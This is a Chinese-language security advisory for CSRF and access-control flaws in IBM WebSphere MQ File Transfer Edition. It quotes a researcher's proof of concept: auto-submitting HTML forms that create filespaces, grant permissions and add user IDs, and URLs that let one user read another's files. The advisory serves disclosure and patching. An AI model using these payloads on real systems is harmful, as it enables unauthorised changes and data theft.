发布日期:2012-08-10
更新日期:2012-08-14
受影响系统:
IBM WebSphere MQ 7.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54983
CVE ID: CVE-2012-3294,CVE-2012-2206
IBM WebSphere MQ用于在企业中提供消息传输服务。
IBM WebSphere MQ在实现上存在两个安全漏洞,可被恶意用户利用绕过某些安全限制并执行跨站请求伪造攻击。
1)应用允许用户通过HTTP请求执行某些操作,而不验证这些请求,登录用户浏览恶意网站后,可导致编辑用户空间或更改文件空间权限。该漏洞存在于File Transfer Edition v7.0.3、7.0.4、Managed File Transfer v7.5.0及其他版本。
2)应用没有验证访问权限导致的错误可被利用下载其他用户文件,成功利用此漏洞需要文件URL。此漏洞存在于File Transfer Edition v7.0.3、7.0.4及其他版本。
<*来源:Nir Valtman
链接:?uid=swg21607481
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Nir Valtman ()提供了如下测试方法:
*Exploit Details:*
*1. CSRF To add user and define his quota on a userspace*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form method="post"
action="https://www.example.com /wmqfteconsole/Filespaces"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="name" value="zzzzzz" />
<input type="hidden"
name="quota" value="15" />
<input type="hidden"
name="id" value="NewFileSpace" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 1]
*2. CSRF to add permissions on file spaces:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form method="post"
action="https://www.example.com
/wmqfteconsole/FileSpacePermisssions"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="user" value="bodek2" />
<input type="hidden"
name="write" value="authorized" />
<input type="hidden"
name="id" value="zzzzzz_TEMP_PERMISSIONS" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
*2. CSRF to add MQMD user id:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form method="post"
action="https://www.example.com/wmqfteconsole/UploadUsers"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="userID" value="csrfUserId" />
<input type="hidden"
name="mqmdUserID" value="userIdTest" />
<input type="hidden"
name="id" value="NewUploadUser" />
</form>
<script>
document.frm.submit();
</script>
</body>
Details:*
*1. Privilege escalation to view other user's files and filespace*
I logged on using user "user2" (non-administrative account
with download\upload files permissions only) and then sent a GET request to
the following URL:
/transfer/?start=0&count=10&metadata=fteSampleSUSEr=user1
As a result, the response included the data of "user1".
*2. Privilege escalation to download user user's files*
In order to execute the attack, the malicious user should know the file
name and the related ID before executing the attack.
In this scenario, The malicious user is "user2" and the attacked user is
"user1".
If "user2" knows the url to file of "user1", then he can access this file,
e.g. "user2" is able to access the following URL using a GET request:
/filespace/user1
/414d512057514d542020202020202020eb3bfc4f2030df02/changedthisfilename.txt
建议:
--------------------------------------------------------------------------------
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: